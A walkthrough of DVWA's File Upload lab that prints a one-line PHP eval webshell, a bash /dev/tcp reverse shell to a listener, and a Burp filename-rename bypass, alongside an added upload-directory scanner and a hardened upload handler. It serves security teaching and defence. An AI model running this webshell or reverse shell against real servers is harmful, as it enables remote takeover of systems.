## Environment

- victim: CentOS 7.6 with DVWA (IP: 192.168.0.250)
- attacker: macOS Mojave (IP: 192.168.0.1), Kali Linux (IP: 192.168.0.128)

The victim has no iptables rules configured.
## Security Level: Low

At the Low security level, File Upload accepts any file, so a PHP file containing a one-line webshell (一句話木馬) is uploaded to the server.

Source code at Security Level = low:
```php
<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}

?>
```
Contents of Hack.php:

```php
<?php @eval($_POST['pass']);?>
```

*Detailed explanation of how the one-line webshell works: to be added.
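The Low level stores whatever the client sends under hackable/uploads/, so a defender's first question is what is already sitting in that directory. The following CLI scanner is an added example, not part of DVWA or of this write-up; it walks an upload directory and reports files that a correct upload control would never have accepted: a non-image extension, an image extension whose bytes do not start with that image format's magic, or a PHP open tag / code-execution call embedded in the contents. The function names, the default directory and the rule that only JPEG and PNG are legitimate are my assumptions; it needs PHP 7.0 or later.

```php
<?php
// Added example, not part of DVWA or the original write-up: a CLI scanner for an
// upload directory such as hackable/uploads/. It reports files that a correct
// file-upload control would never have accepted. Assumes PHP >= 7.0 and that
// JPEG and PNG are the only legitimate contents of the directory.
declare(strict_types=1);

// Magic bytes each allowed extension must start with.
const IMAGE_MAGIC = [
    'jpg'  => "\xFF\xD8\xFF",
    'jpeg' => "\xFF\xD8\xFF",
    'png'  => "\x89PNG\r\n\x1a\n",
];

/** Return the reasons a file is suspicious; an empty array means it looks clean. */
function inspect_upload(string $path): array
{
    $reasons = [];
    $ext  = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    $body = (string) file_get_contents($path);

    if (!array_key_exists($ext, IMAGE_MAGIC)) {
        $reasons[] = "extension '.$ext' is not an allowed image type";
    } elseif (strncmp($body, IMAGE_MAGIC[$ext], strlen(IMAGE_MAGIC[$ext])) !== 0) {
        // Image extension, but the bytes are not that image format (e.g. a renamed script).
        $reasons[] = "contents do not start with the magic bytes of a .$ext image";
    }
    // A PHP open tag anywhere in the file, including after valid image data.
    if (preg_match('/<\?(php|=)/i', $body) === 1) {
        $reasons[] = 'contains a PHP open tag';
    }
    // Functions a one-line webshell typically hands request input to.
    if (preg_match('/\b(eval|assert|system|passthru|shell_exec)\s*\(/i', $body) === 1) {
        $reasons[] = 'contains a code-execution function call';
    }
    return $reasons;
}

/** Walk a directory tree and collect findings keyed by path. */
function scan_dir(string $dir): array
{
    $findings = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if (!$file->isFile()) {
            continue;
        }
        $reasons = inspect_upload($file->getPathname());
        if ($reasons !== []) {
            $findings[$file->getPathname()] = $reasons;
        }
    }
    return $findings;
}

// Usage: php scan_uploads.php /var/www/html/hackable/uploads
$dir = $argv[1] ?? 'hackable/uploads';
if (!is_dir($dir)) {
    fwrite(STDERR, "not a directory: $dir\n");
    exit(1);
}
foreach (scan_dir($dir) as $path => $reasons) {
    echo $path, "\n  - ", implode("\n  - ", $reasons), "\n";
}
```

Run against the Hack.php above, the scanner reports all three reasons for that file: the `.php` extension is not an image type, the file contains a PHP open tag, and `@eval(` is a code-execution call. The magic-byte rule is what catches a script that has merely been renamed to `.png`: the extension passes, but the first bytes are `<?php`, not the PNG signature. The scanner is meant to run from cron or during incident response, not to replace validation at upload time.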
### Altman

Altman is a cross-platform webshell client that runs on macOS, Linux, Windows and other systems. Right-click in the window to add a webshell, and fill in, in order, the webshell alias, the webshell execution type, the URL, and the parameter string used in the one-line webshell. Right-clicking an entry gives access to a file manager, a shell command window and so on. Here shellCmder is chosen; checking the current user shows that it is apache.

However, from this shell it is not possible to switch the user to root or to run most other programs (it is a low-privilege context). So we need to set up a reverse shell on the victim, so that we can interact with it through an interactive shell. First, on Kali Linux, listen on port 2333 and wait for the victim to connect:
```bash
nc -lvp 2333   # this tool is netcat
listening on [any] 2333
```

In Altman, run the following command to connect to Kali Linux on port 2333:

```bash
bash -i >& /dev/tcp/192.168.0.128/2333 0>&1
```

In the Kali Linux terminal you can see that the connection succeeded and that it is an interactive shell, from which it is possible to switch directly to root.
## Security Level: Medium

```php
<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>
```
From the source code, this level only accepts files whose reported type is image/jpeg or image/png (taken from `$_FILES['uploaded']['type']`, i.e. the Content-Type the client sent) and whose size is under 100KB.
Therefore the one-line webshell has to be uploaded with a jpg/png extension, and then Burp Suite is used to intercept the request and change the extension inside it. Burp Suite works as a proxy, so the browser must be configured to use it; the default port is 8080.

![](https://i.imgur.com/DuimiM8.png)

Switch Intercept to on so that Burp Suite captures the request.

![](https://i.imgur.com/B6ZkGTp.png)

In Content-Disposition, change `filename="hack-medium.php"` to `filename="hack-medium.png"`; this way what the server receives is still of type PNG, but the file actually stored is of type php. Running the webshell and escalating privileges afterwards is the same as at security level Low.

## Security Level: High

```php
<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>
```
`strrpos()` finds the position of the last occurrence of the given substring. In `substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);`, the position of the last `'.'` is found and 1 is added to it, and that value is passed to `substr()` to take the part of the string starting at that position. In other words, `$uploaded_ext` is the extension string (like `'jpg'`).
`getimagesize()` returns the image dimensions and related information. Example:

```
Array ( [0] => 105 [1] => 60 [2] => 3 [3] => width="105" height="60" [bits] => 8 [mime] => image/png )
```
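Each level above fixes one symptom (any file; client-declared Content-Type; extension string plus a header parse) while keeping the client's filename as the destination. The handler below is an added example, not DVWA's code and not from this write-up, showing how the same upload can be handled so that none of those checks is the only line of defence: the MIME type is read from the file's bytes, the image is decoded and re-encoded, and the stored name and extension are chosen by the server. `store_image()`, `UPLOAD_DIR` and the directory path are my own names and assumptions; it requires PHP 7.0 or later with the fileinfo and GD extensions.

```php
<?php
// Added example, not DVWA's code: a hardened version of the upload handler shown
// above. Assumes PHP >= 7.0 with the fileinfo and GD extensions enabled; the
// upload directory below is a hypothetical path that the web server does not serve.
declare(strict_types=1);

const UPLOAD_DIR = '/var/lib/dvwa-uploads';   // assumed: outside the web root
const MAX_BYTES  = 100000;                    // same limit as the Medium/High levels

// Accepted types, keyed by the MIME type derived from the file's bytes, mapped to
// the extension the server assigns. The client's filename is never reused.
const ALLOWED = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
];

/**
 * Validate one $_FILES entry and store it; returns the server-chosen filename.
 * Throws RuntimeException on any rejection.
 */
function store_image(array $file, string $uploadDir = UPLOAD_DIR): string
{
    // 1. Reject anything PHP itself flagged (partial upload, ini size limit, no file).
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload error code ' . (int) ($file['error'] ?? UPLOAD_ERR_NO_FILE));
    }
    $tmp = (string) $file['tmp_name'];
    // 2. Only operate on a file that was uploaded in this request.
    if (!is_uploaded_file($tmp)) {
        throw new RuntimeException('not an uploaded file');
    }
    // 3. Size, measured on the temporary file.
    $size = filesize($tmp);
    if ($size === false || $size >= MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // 4. MIME type from the file's content, not from the Content-Type header the
    //    client sent (the Medium level compared only that header).
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    if ($mime === false || !array_key_exists($mime, ALLOWED)) {
        throw new RuntimeException('unsupported type');
    }
    // 5. getimagesize() (used at the High level) only parses the image header, so a
    //    real image with extra data appended still passes it. Decoding and
    //    re-encoding through GD writes a new file containing only what the decoder
    //    understood as image data.
    $img = @imagecreatefromstring((string) file_get_contents($tmp));
    if ($img === false) {
        throw new RuntimeException('not a decodable image');
    }
    // 6. Server-chosen name: random, no user input, extension from the ALLOWED table.
    //    Renaming the file in the request therefore has no effect on what is stored.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    $ok   = ($mime === 'image/png') ? imagepng($img, $dest) : imagejpeg($img, $dest, 90);
    imagedestroy($img);
    if (!$ok) {
        throw new RuntimeException('could not write image');
    }
    chmod($dest, 0644);
    return $name;
}

if (isset($_POST['Upload'], $_FILES['uploaded'])) {
    try {
        $stored = store_image($_FILES['uploaded']);
        echo '<pre>Your image was stored as ' . htmlspecialchars($stored) . '</pre>';
    } catch (RuntimeException $e) {
        // Generic message to the client; the reason goes to the server log only.
        error_log('upload rejected from ' . ($_SERVER['REMOTE_ADDR'] ?? '?') . ': ' . $e->getMessage());
        echo '<pre>Your image was not uploaded.</pre>';
    }
}
```

Two points about the design. Because the destination name and extension come from the `ALLOWED` table rather than from `$_FILES['uploaded']['name']`, the Burp step of editing `filename=` in the multipart request no longer influences anything, and the `basename()` concatenation that every DVWA level used disappears with it. And because the files are written outside the web root (or, if they must stay under it, into a directory where the web server is configured not to execute PHP), a stored file cannot be invoked as a script even if some future check is bypassed; that is what turns an upload bug into a broken image instead of a webshell. The log line on rejection is what a SOC would correlate with the scanner output and with unexpected outbound connections from the apache user.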